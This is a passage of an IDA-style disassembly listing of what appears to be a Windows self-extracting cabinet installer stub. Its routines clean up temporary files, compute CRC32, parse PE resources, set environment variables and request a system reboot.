call ds:GetLastError
cmp eax, 2
jz short loc_1001622
cmp eax, 3
jz short loc_1001622
push 4 ; dwFlags
push ebp ; lpNewFileName
push dword ptr [esi+4] ; lpExistingFileName
call ebx ; MoveFileExA
loc_1001622: ; CODE XREF: sub_10015BE+4A�j
; sub_10015BE+55�j ...
mov [esi+4], ebp
loc_1001625: ; CODE XREF: sub_10015BE+3F�j
mov esi, [esi]
loc_1001627: ; CODE XREF: sub_10015BE+38�j
cmp esi, edi
jnz short loc_10015F8
mov esi, off_1007008
mov ebp, ds:RemoveDirectoryA
mov edi, offset off_1007008
jmp short loc_100166B
; ---------------------------------------------------------------------------
loc_100163E: ; CODE XREF: sub_10015BE+AF�j
mov eax, [esi+4]
test eax, eax
jz short loc_1001669
push eax ; lpPathName
call ebp ; RemoveDirectoryA
test eax, eax
jnz short loc_1001665
call ds:GetLastError
cmp eax, 2
jz short loc_1001665
cmp eax, 3
jz short loc_1001665
push 4 ; dwFlags
push 0 ; lpNewFileName
push dword ptr [esi+4] ; lpExistingFileName
call ebx ; MoveFileExA
loc_1001665: ; CODE XREF: sub_10015BE+8C�j
; sub_10015BE+97�j ...
and dword ptr [esi+4], 0
loc_1001669: ; CODE XREF: sub_10015BE+85�j
mov esi, [esi]
loc_100166B: ; CODE XREF: sub_10015BE+7E�j
cmp esi, edi
jnz short loc_100163E
mov eax, hFile
cmp eax, 0FFFFFFFFh
jz short loc_1001687
push eax ; hObject
call ds:CloseHandle ; CloseHandle
or hFile, 0FFFFFFFFh
loc_1001687: ; CODE XREF: sub_10015BE+B9�j
mov esi, offset Buffer
push esi ; lpPathName
call ebp ; RemoveDirectoryA
test eax, eax
jnz short loc_10016AA
call ds:GetLastError
cmp eax, 2
jz short loc_10016AA
cmp eax, 3
jz short loc_10016AA
push 4 ; dwFlags
push 0 ; lpNewFileName
push esi ; lpExistingFileName
call ebx ; MoveFileExA
loc_10016AA: ; CODE XREF: sub_10015BE+D3�j
; sub_10015BE+DE�j ...
push offset CriticalSection ; lpCriticalSection
call ds:LeaveCriticalSection
pop edi
pop esi
pop ebp
pop ebx
retn
sub_10015BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; INT_PTR __stdcall sub_10016BA(HWND, UINT, WPARAM, LPARAM)
sub_10016BA proc near ; DATA XREF: StartAddress+2�o
hDlg = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 10h
jz short loc_100172D
cmp [ebp+arg_4], 16h
jz short loc_100170A
cmp [ebp+arg_4], 110h
jnz short loc_1001729
cmp dword_1007038, 0
mov eax, [ebp+hDlg]
mov hWnd, eax
jz short loc_10016FC
push 0FFFFFFFDh ; hWndNewParent
push eax ; hWndChild
call ds:SetParent ; SetParent
push 1F4h ; dwMilliseconds
mov hWndNewParent, eax
call ds:Sleep ; Sleep
loc_10016FC: ; CODE XREF: sub_10016BA+27�j
push hEvent ; hEvent
call ds:SetEvent ; SetEvent
jmp short loc_100173F
; ---------------------------------------------------------------------------
loc_100170A: ; CODE XREF: sub_10016BA+D�j
cmp [ebp+arg_8], 0
jz short loc_1001729
call sub_10015BE
mov eax, hProcess
test eax, eax
jz short loc_100173F
push 1 ; uExitCode
push eax ; hProcess
call ds:TerminateProcess ; TerminateProcess
jmp short loc_100173F
; ---------------------------------------------------------------------------
loc_1001729: ; CODE XREF: sub_10016BA+16�j
; sub_10016BA+54�j
xor eax, eax
jmp short loc_1001742
; ---------------------------------------------------------------------------
loc_100172D: ; CODE XREF: sub_10016BA+7�j
and hWnd, 0
push 0 ; nResult
push [ebp+hDlg] ; hDlg
call ds:EndDialog ; EndDialog
loc_100173F: ; CODE XREF: sub_10016BA+4E�j
; sub_10016BA+62�j ...
xor eax, eax
inc eax
loc_1001742: ; CODE XREF: sub_10016BA+71�j
pop ebp
retn 10h
sub_10016BA endp
; =============== S U B R O U T I N E =======================================
sub_1001746 proc near ; CODE XREF: sub_1002272+2A4�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, offset Buffer
loc_1001750: ; CODE XREF: sub_1001746+17�j
mov cl, [eax]
cmp cl, 20h
jz short loc_100175C
cmp cl, 9
jnz short loc_100175F
loc_100175C: ; CODE XREF: sub_1001746+F�j
inc eax
jmp short loc_1001750
; ---------------------------------------------------------------------------
loc_100175F: ; CODE XREF: sub_1001746+14�j
mov ecx, eax
push edi
lea edi, [ecx+1]
loc_1001765: ; CODE XREF: sub_1001746+24�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_1001765
sub ecx, edi
inc ecx
cmp ecx, 104h
pop edi
jb short loc_100177C
xor eax, eax
jmp short loc_10017B0
; ---------------------------------------------------------------------------
loc_100177C: ; CODE XREF: sub_1001746+30�j
mov cl, [eax]
cmp cl, 22h
jnz short loc_10017A6
jmp short loc_100178D
; ---------------------------------------------------------------------------
loc_1001785: ; CODE XREF: sub_1001746+4C�j
cmp cl, 22h
jz short loc_10017AA
mov [esi], cl
inc esi
loc_100178D: ; CODE XREF: sub_1001746+3D�j
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_1001785
jmp short loc_10017AA
; ---------------------------------------------------------------------------
loc_1001796: ; CODE XREF: sub_1001746+62�j
cmp cl, 20h
jz short loc_10017AA
cmp cl, 9
jz short loc_10017AA
mov [esi], cl
inc esi
inc eax
mov cl, [eax]
loc_10017A6: ; CODE XREF: sub_1001746+3B�j
test cl, cl
jnz short loc_1001796
loc_10017AA: ; CODE XREF: sub_1001746+42�j
; sub_1001746+4E�j ...
and byte ptr [esi], 0
xor eax, eax
inc eax
loc_10017B0: ; CODE XREF: sub_1001746+34�j
pop esi
retn 4
sub_1001746 endp
; =============== S U B R O U T I N E =======================================
sub_10017B4 proc near ; CODE XREF: start_0+41�p
xor ecx, ecx
loc_10017B6: ; CODE XREF: sub_10017B4+27�j
push 8
mov eax, ecx
pop edx
loc_10017BB: ; CODE XREF: sub_10017B4+17�j
test al, 1
jz short loc_10017C8
shr eax, 1
xor eax, 0EDB88320h
jmp short loc_10017CA
; ---------------------------------------------------------------------------
loc_10017C8: ; CODE XREF: sub_10017B4+9�j
shr eax, 1
loc_10017CA: ; CODE XREF: sub_10017B4+12�j
dec edx
jnz short loc_10017BB
mov dword_1007040[ecx*4], eax
inc ecx
cmp ecx, 100h
jb short loc_10017B6
retn
sub_10017B4 endp
; =============== S U B R O U T I N E =======================================
sub_10017DE proc near ; CODE XREF: sub_100180D+172�p
; start_0+18A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
test edx, edx
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
jz short locret_100180A
push esi
push edi
loc_10017F0: ; CODE XREF: sub_10017DE+28�j
movzx esi, byte ptr [ecx]
movzx edi, al
xor esi, edi
mov esi, dword_1007040[esi*4]
shr eax, 8
xor eax, esi
inc ecx
dec edx
jnz short loc_10017F0
pop edi
pop esi
locret_100180A: ; CODE XREF: sub_10017DE+E�j
retn 0Ch
sub_10017DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100180D(LPCSTR NumberOfBytesRead)
sub_100180D proc near ; CODE XREF: sub_1002272+4B�p
Buffer = dword ptr -114h
var_100 = word ptr -100h
lDistanceToMove = dword ptr -0D8h
var_7C = dword ptr -7Ch
nNumberOfBytesToRead= dword ptr -78h
var_1C = dword ptr -1Ch
lpWideCharStr = dword ptr -18h
var_14 = dword ptr -14h
lpName = dword ptr -10h
hObject = dword ptr -0Ch
var_8 = dword ptr -8
UsedDefaultChar = dword ptr -4
NumberOfBytesRead= dword ptr 8
push ebp
mov ebp, esp
sub esp, 114h
push ebx
xor ebx, ebx
push ebx ; hTemplateFile
push 10000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+NumberOfBytesRead] ; lpFileName
call ds:CreateFileA ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz loc_1001B17
push esi
push edi
mov edi, ds:ReadFile
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesRead]
push ecx ; lpNumberOfBytesRead
mov esi, 0F8h
push esi ; nNumberOfBytesToRead
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push eax ; hFile
call edi ; ReadFile
test eax, eax
jz loc_1001B0C
cmp [ebp+NumberOfBytesRead], esi
jnz loc_1001B0C
cmp word ptr [ebp+Buffer], 5A4Dh
jnz short loc_10018B7
push ebx ; dwMoveMethod
push ebx ; lpDistanceToMoveHigh
push [ebp+lDistanceToMove] ; lDistanceToMove
push [ebp+hObject] ; hFile
call ds:SetFilePointer ; SetFilePointer
cmp eax, [ebp+lDistanceToMove]
jnz loc_1001B0C
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push esi ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call edi ; ReadFile
test eax, eax
jz loc_1001B0C
cmp [ebp+NumberOfBytesRead], esi
jnz loc_1001B0C
loc_10018B7: ; CODE XREF: sub_100180D+68�j
cmp [ebp+Buffer], 4550h
jnz loc_1001B0C
cmp [ebp+var_100], 0E0h
jb loc_1001B0C
cmp [ebp+var_7C], ebx
jz loc_1001B0C
cmp [ebp+nNumberOfBytesToRead], ebx
jz loc_1001B0C
cmp [ebp+nNumberOfBytesToRead], 40000h
ja loc_1001B0C
push [ebp+nNumberOfBytesToRead] ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
mov esi, eax
cmp esi, ebx
mov [ebp+var_14], esi
jz loc_1001B0C
push ebx ; dwMoveMethod
push ebx ; lpDistanceToMoveHigh
push [ebp+var_7C] ; lDistanceToMove
push [ebp+hObject] ; hFile
call ds:SetFilePointer ; SetFilePointer
cmp eax, [ebp+var_7C]
jnz loc_1001B0C
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead
push esi ; lpBuffer
push [ebp+hObject] ; hFile
call edi ; ReadFile
test eax, eax
jz loc_1001B0C
mov ecx, [ebp+nNumberOfBytesToRead]
cmp [ebp+NumberOfBytesRead], ecx
jnz loc_1001B0C
mov eax, esi
mov [ebp+UsedDefaultChar], ecx
cmp ecx, 16h
jmp short loc_1001993
; ---------------------------------------------------------------------------
loc_1001956: ; CODE XREF: sub_100180D+189�j
cmp byte ptr [eax], 0C0h
jnz short loc_100198B
push 4
pop ecx
mov edi, offset dword_100118C
mov esi, eax
xor edx, edx
repe cmpsd
jnz short loc_100198B
mov ecx, [eax+10h]
cmp ecx, 16h
mov [ebp+NumberOfBytesRead], ecx
jb short loc_100198B
cmp ecx, [ebp+UsedDefaultChar]
ja short loc_100198B
push ecx
push eax
push 0FFFFFFFFh
call sub_10017DE
test eax, eax
jz short loc_100199D
mov eax, [ebp+var_8]
loc_100198B: ; CODE XREF: sub_100180D+14C�j
; sub_100180D+15C�j ...
inc eax
dec [ebp+UsedDefaultChar]
cmp [ebp+UsedDefaultChar], 16h
loc_1001993: ; CODE XREF: sub_100180D+147�j
mov [ebp+var_8], eax
jnb short loc_1001956
jmp loc_1001B0C
; ---------------------------------------------------------------------------
loc_100199D: ; CODE XREF: sub_100180D+179�j
mov ecx, [ebp+var_8]
test cl, 3
jz short loc_10019C2
mov edi, [ebp+var_14]
mov esi, edi
jmp short loc_10019B5
; ---------------------------------------------------------------------------
loc_10019AC: ; CODE XREF: sub_100180D+1AB�j
dec [ebp+NumberOfBytesRead]
mov al, [ecx]
mov [esi], al
inc esi
inc ecx
loc_10019B5: ; CODE XREF: sub_100180D+19D�j
cmp [ebp+NumberOfBytesRead], ebx
jnz short loc_10019AC
dec [ebp+NumberOfBytesRead]
mov [ebp+var_8], edi
mov ecx, edi
loc_10019C2: ; CODE XREF: sub_100180D+196�j
movzx edx, word ptr [ecx+14h]
mov eax, [ecx+10h]
add eax, ecx
add ecx, 16h
cmp edx, ebx
mov [ebp+var_14], edx
mov [ebp+var_1C], eax
jz loc_1001B0C
mov edi, ds:WideCharToMultiByte
jmp short loc_10019EA
; ---------------------------------------------------------------------------
loc_10019E4: ; CODE XREF: sub_100180D+2F9�j
mov ecx, [ebp+var_8]
mov eax, [ebp+var_1C]
loc_10019EA: ; CODE XREF: sub_100180D+1D5�j
mov edx, ecx
add ecx, 4
cmp ecx, eax
mov [ebp+lpName], edx
ja loc_1001B0C
mov ax, [edx]
test al, 1
jnz loc_1001B0C
test byte ptr [edx+2], 1
jnz loc_1001B0C
movzx edx, word ptr [edx+2]
movzx eax, ax
mov esi, ecx
add ecx, eax
mov [ebp+lpWideCharStr], ecx
add ecx, edx
cmp ecx, [ebp+var_1C]
mov [ebp+var_8], ecx
ja loc_1001B0C
mov ecx, [ebp+lpWideCharStr]
shr eax, 1
mov [esi+eax*2-2], bx
mov eax, [ebp+lpName]
movzx eax, word ptr [eax+2]
push 2
shr eax, 1
mov [ecx+eax*2-2], bx
pop eax
sub esi, eax
mov word ptr [esi], 5Fh
sub esi, eax
mov word ptr [esi], 58h
sub esi, eax
mov word ptr [esi], 46h
sub esi, eax
mov word ptr [esi], 53h
sub esi, eax
lea eax, [ebp+UsedDefaultChar]
push eax ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebx ; cbMultiByte
push ebx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
mov word ptr [esi], 5Fh
call edi ; WideCharToMultiByte
cmp eax, ebx
mov [ebp+NumberOfBytesRead], eax
jz loc_1001B03
cmp [ebp+UsedDefaultChar], ebx
jnz short loc_1001B03
push eax ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
cmp eax, ebx
mov [ebp+lpName], eax
jz short loc_1001B0C
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push [ebp+NumberOfBytesRead] ; cbMultiByte
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
push ebx ; nSize
push ebx ; lpBuffer
push [ebp+lpName] ; lpName
call ds:GetEnvironmentVariableA ; GetEnvironmentVariableA
test eax, eax
jnz short loc_1001B03
lea eax, [ebp+UsedDefaultChar]
push eax ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebx ; cbMultiByte
push ebx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
cmp eax, ebx
mov [ebp+NumberOfBytesRead], eax
jz short loc_1001B03
cmp [ebp+UsedDefaultChar], ebx
jnz short loc_1001B03
push eax ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
mov esi, eax
cmp esi, ebx
jz short loc_1001B0C
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push [ebp+NumberOfBytesRead] ; cbMultiByte
push esi ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
push esi ; lpValue
push [ebp+lpName] ; lpName
call ds:SetEnvironmentVariableA ; SetEnvironmentVariableA
loc_1001B03: ; CODE XREF: sub_100180D+26F�j
; sub_100180D+278�j ...
dec [ebp+var_14]
jnz loc_10019E4
loc_1001B0C: ; CODE XREF: sub_100180D+50�j
; sub_100180D+59�j ...
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
pop edi
pop esi
loc_1001B17: ; CODE XREF: sub_100180D+2B�j
pop ebx
leave
retn 4
sub_100180D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001B1C proc near ; CODE XREF: sub_1001D83+64�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
cdq
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
push esi
xor esi, esi
sub eax, esi
mov [ebp+var_10], 1
mov [ebp+var_8], edx
jz short loc_1001B45
dec eax
jnz short loc_1001B99
and [ebp+var_4], esi
jmp short loc_1001B4C
; ---------------------------------------------------------------------------
loc_1001B45: ; CODE XREF: sub_1001B1C+1F�j
mov [ebp+var_4], 2
loc_1001B4C: ; CODE XREF: sub_1001B1C+27�j
lea eax, [ebp+arg_0]
push eax
push 28h
push 0FFFFFFFFh
call ds:NtOpenProcessToken ; NtOpenProcessToken
test eax, eax
jl short loc_1001B99
cmp [ebp+arg_8], 0
mov eax, [ebp+arg_C]
jz short loc_1001B6D
test eax, eax
jz short loc_1001B6D
mov esi, [eax]
loc_1001B6D: ; CODE XREF: sub_1001B1C+49�j
; sub_1001B1C+4D�j
push eax
push [ebp+arg_8]
lea eax, [ebp+var_10]
push esi
push eax
push 0
push [ebp+arg_0]
call ds:NtAdjustPrivilegesToken ; NtAdjustPrivilegesToken
test eax, eax
push [ebp+arg_0]
jl short loc_1001B93
call ds:NtClose ; NtClose
xor eax, eax
inc eax
jmp short loc_1001B9B
; ---------------------------------------------------------------------------
loc_1001B93: ; CODE XREF: sub_1001B1C+6A�j
call ds:NtClose ; NtClose
loc_1001B99: ; CODE XREF: sub_1001B1C+22�j
; sub_1001B1C+40�j
xor eax, eax
loc_1001B9B: ; CODE XREF: sub_1001B1C+75�j
pop esi
leave
retn 10h
sub_1001B1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001BA0 proc near ; CODE XREF: sub_1001D83+169�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
cmp [ebp+arg_0], esi
jz short loc_1001BE6
lea eax, [ebp+var_4]
push eax
push 28h
push 0FFFFFFFFh
call ds:NtOpenProcessToken ; NtOpenProcessToken
test eax, eax
jl short loc_1001BE6
push esi
push esi
push esi
push [ebp+arg_0]
push esi
push [ebp+var_4]
call ds:NtAdjustPrivilegesToken ; NtAdjustPrivilegesToken
test eax, eax
push [ebp+var_4]
jl short loc_1001BE0
call ds:NtClose ; NtClose
xor eax, eax
inc eax
jmp short loc_1001BE8
; ---------------------------------------------------------------------------
loc_1001BE0: ; CODE XREF: sub_1001BA0+33�j
call ds:NtClose ; NtClose
loc_1001BE6: ; CODE XREF: sub_1001BA0+A�j
; sub_1001BA0+1C�j
xor eax, eax
loc_1001BE8: ; CODE XREF: sub_1001BA0+3E�j
pop esi
leave
retn 4
sub_1001BA0 endp
; =============== S U B R O U T I N E =======================================
sub_1001BED proc near ; CODE XREF: sub_100368F+93�p
; sub_100368F+A5�p ...
xor eax, eax
retn
sub_1001BED endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_1001BF1 proc near ; CODE XREF: start_0:loc_100305B�p
NumberOfBytesWritten= dword ptr -4
push ecx
push ebp
xor ebp, ebp
push ebp ; nSize
push ebp ; lpBuffer
push offset Name ; "_SFX_CAB_SHUTDOWN_REQUEST"
call ds:GetEnvironmentVariableA ; GetEnvironmentVariableA
test eax, eax
jnz loc_1001CB6
push esi
push edi
mov esi, offset Value
push esi
push offset dword_10011A0
push offset Buffer
call sub_100144B
push ebp ; hTemplateFile
push 4000002h ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push ebp ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push esi ; lpFileName
call ds:CreateFileA ; CreateFileA
mov edx, eax
cmp edx, 0FFFFFFFFh
mov hFile, edx
jz short loc_1001CB4
push ebx
mov ebx, offset dword_1007440
xor eax, eax
push ebp ; lpOverlapped
mov ecx, 84h
mov edi, ebx
rep stosd
lea eax, [esp+18h+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
mov edi, 210h
push edi ; nNumberOfBytesToWrite
push ebx ; lpBuffer
push edx ; hFile
mov dword_1007440, 6E776453h
mov dword_1007444, 10000h
mov dword_1007448, 0C0000013h
call ds:WriteFile ; WriteFile
test eax, eax
pop ebx
jz short loc_1001CA1
cmp [esp+10h+NumberOfBytesWritten], edi
jnz short loc_1001CA1
push esi ; lpValue
push offset Name ; "_SFX_CAB_SHUTDOWN_REQUEST"
call ds:SetEnvironmentVariableA ; SetEnvironmentVariableA
jmp short loc_1001CB4
; ---------------------------------------------------------------------------
loc_1001CA1: ; CODE XREF: sub_1001BF1+9A�j
; sub_1001BF1+A0�j
push hFile ; hObject
call ds:CloseHandle ; CloseHandle
or hFile, 0FFFFFFFFh
loc_1001CB4: ; CODE XREF: sub_1001BF1+52�j
; sub_1001BF1+AE�j
pop edi
pop esi
loc_1001CB6: ; CODE XREF: sub_1001BF1+13�j
pop ebp
pop ecx
retn
sub_1001BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
; int __cdecl sub_1001CB9(UINT dwMessageId)
sub_1001CB9 proc near ; CODE XREF: StartAddress+24�p
; sub_1001EFD+18�p ...
Buffer = byte ptr -280h
Caption = byte ptr -80h
dwMessageId = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 280h
push esi
mov esi, [ebp+74h+dwMessageId]
cmp esi, 0FFFFFFFFh
jnz short loc_1001CD5
call ds:GetLastError
mov esi, eax
loc_1001CD5: ; CODE XREF: sub_1001CB9+12�j
cmp dword_1017C20, 0
jnz short loc_1001D2A
lea eax, [ebp+74h+Buffer]
push eax ; lpBuffer
push 200h ; nSize
push esi ; dwMessageId
call sub_1001556
and [ebp+74h+Caption], 0
push 80h ; cchBufferMax
lea eax, [ebp+74h+Caption]
push eax ; lpBuffer
push 20000003h ; uID
push hInstance ; hInstance
call ds:LoadStringA ; LoadStringA
push 10010h ; uType
lea eax, [ebp+74h+Caption]
push eax ; lpCaption
lea eax, [ebp+74h+Buffer]
push eax ; lpText
push hWnd ; hWnd
call ds:MessageBoxA ; MessageBoxA
loc_1001D2A: ; CODE XREF: sub_1001CB9+23�j
call sub_10015BE
test esi, esi
jnz short loc_1001D34
inc esi
loc_1001D34: ; CODE XREF: sub_1001CB9+78�j
cmp dword_1007024, 0
jz short loc_1001D4F
push offset CriticalSection ; lpCriticalSection
call ds:DeleteCriticalSection
and dword_1007024, 0
loc_1001D4F: ; CODE XREF: sub_1001CB9+82�j
push esi ; uExitCode
call ds:ExitProcess ; ExitProcess
sub_1001CB9 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: start_0+8E�o
push 0 ; dwInitParam
push offset sub_10016BA ; lpDialogFunc
push 0 ; hWndParent
push 64h ; lpTemplateName
push hInstance ; hInstance
call ds:DialogBoxParamA ; DialogBoxParamA
and hWnd, 0
test eax, eax
jz short locret_1001D80
push 0FFFFFFFFh ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
locret_1001D80: ; CODE XREF: StartAddress+20�j
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
; int __stdcall sub_1001D83(BOOL bRebootAfterShutdown, BOOL bForceAppsClosed, HMODULE hLibModule, int, int)
sub_1001D83 proc near ; CODE XREF: start_0+4EF�p
FileName = byte ptr -1B4h
VersionInformation= _OSVERSIONINFOA ptr -0B0h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
bRebootAfterShutdown= dword ptr 8
bForceAppsClosed= dword ptr 0Ch
hLibModule = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-64h]
sub esp, 1B4h
push ebx
push esi
push offset aWfp_idle_trigg ; "WFP_IDLE_TRIGGER"
xor ebx, ebx
push ebx ; bInheritHandle
push 100000h ; dwDesiredAccess
mov [ebp+64h+var_4], 10h
call ds:OpenEventA ; OpenEventA
mov esi, eax
cmp esi, ebx
jz short loc_1001DC5
push 0EA60h ; dwMilliseconds
push esi ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
push esi ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_1001DDC
; ---------------------------------------------------------------------------
loc_1001DC5: ; CODE XREF: sub_1001D83+2B�j
cmp [ebp+64h+hLibModule], ebx
jz short loc_1001DD1
push 0EA60h
jmp short loc_1001DD6
; ---------------------------------------------------------------------------
loc_1001DD1: ; CODE XREF: sub_1001D83+45�j
push 2710h ; dwMilliseconds
loc_1001DD6: ; CODE XREF: sub_1001D83+4C�j
call ds:Sleep ; Sleep
loc_1001DDC: ; CODE XREF: sub_1001D83+40�j
lea eax, [ebp+64h+var_4]
push eax
lea eax, [ebp+64h+var_14]
push eax
push ebx
push 13h
call sub_1001B1C
test eax, eax
jz loc_1001EF4
push edi
push offset LibFileName ; "advapi32.dll"
call ds:LoadLibraryA ; LoadLibraryA
cmp eax, ebx
mov [ebp+64h+hLibModule], eax
jz short loc_1001E29
push offset ProcName ; "InitiateSystemShutdownExA"
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
cmp eax, ebx
jz short loc_1001E29
push [ebp+64h+arg_10]
push [ebp+64h+bRebootAfterShutdown]
push [ebp+64h+bForceAppsClosed]
push ebx
push [ebp+64h+arg_C]
push ebx
call eax
jmp short loc_1001E38
; ---------------------------------------------------------------------------
loc_1001E29: ; CODE XREF: sub_1001D83+82�j
; sub_1001D83+92�j
push [ebp+64h+bRebootAfterShutdown] ; bRebootAfterShutdown
push [ebp+64h+bForceAppsClosed] ; bForceAppsClosed
push ebx ; dwTimeout
push ebx ; lpMessage
push ebx ; lpMachineName
call ds:InitiateSystemShutdownA ; InitiateSystemShutdownA
loc_1001E38: ; CODE XREF: sub_1001D83+A4�j
mov edi, eax
cmp edi, ebx
jnz loc_1001EDA
mov esi, ds:GetVersionExA
lea eax, [ebp+64h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+64h+VersionInformation.dwOSVersionInfoSize], 94h
call esi ; GetVersionExA
cmp [ebp+64h+VersionInformation.dwMajorVersion], 4
jbe short loc_1001EDA
lea eax, [ebp+64h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+64h+VersionInformation.dwOSVersionInfoSize], 9Ch
call esi ; GetVersionExA
test [ebp+64h+var_18], 40h
jz short loc_1001EDA
push 104h ; uSize
lea eax, [ebp+64h+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
test eax, eax
jz short loc_1001EDA
lea eax, [ebp+64h+FileName]
push 5Ch ; Val
push eax ; Str
call ds:strchr ; strchr
pop ecx
pop ecx
push ebx ; hTemplateFile
push 2000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 7 ; dwShareMode
mov [eax+1], bl
push 0C0000000h ; dwDesiredAccess
lea eax, [ebp+64h+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_1001EDA
push esi ; hFile
call ds:FlushFileBuffers ; FlushFileBuffers
push esi ; hObject
mov edi, eax
call ds:CloseHandle ; CloseHandle
cmp edi, ebx
jz short loc_1001EDA
push 1
call ds:NtShutdownSystem ; NtShutdownSystem
mov edi, eax
loc_1001EDA: ; CODE XREF: sub_1001D83+B9�j
; sub_1001D83+D6�j ...
cmp [ebp+64h+hLibModule], ebx
jz short loc_1001EE8
push [ebp+64h+hLibModule] ; hLibModule
call ds:FreeLibrary ; FreeLibrary
loc_1001EE8: ; CODE XREF: sub_1001D83+15A�j
lea eax, [ebp+64h+var_14]
push eax
call sub_1001BA0
mov eax, edi
pop edi
loc_1001EF4: ; CODE XREF: sub_1001D83+6B�j
pop esi
pop ebx
add ebp, 64h
leave
retn 14h
sub_1001D83 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001EFD(SIZE_T dwBytes)
sub_1001EFD proc near ; CODE XREF: sub_1001FAA+96�p
; sub_1001FAA+E5�p ...
dwBytes = dword ptr 4
push [esp+dwBytes] ; dwBytes
push 8 ; dwFlags
push hHeap ; hHeap
call ds:HeapAlloc
test eax, eax
jnz short locret_1001F1A
push 8 ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
locret_1001F1A: ; CODE XREF: sub_1001EFD+14�j
retn
sub_1001EFD endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_1001F1B(LPCSTR lpFileName)
sub_1001F1B proc near ; CODE XREF: start_0+146�p
; DATA XREF: start_0+1DA�o
lpFileName = dword ptr 4
push esi
push 0 ; hTemplateFile
push 8000000h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [esp+1Ch+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_1001F45
push eax ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1001F45: ; CODE XREF: sub_1001F1B+22�j
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
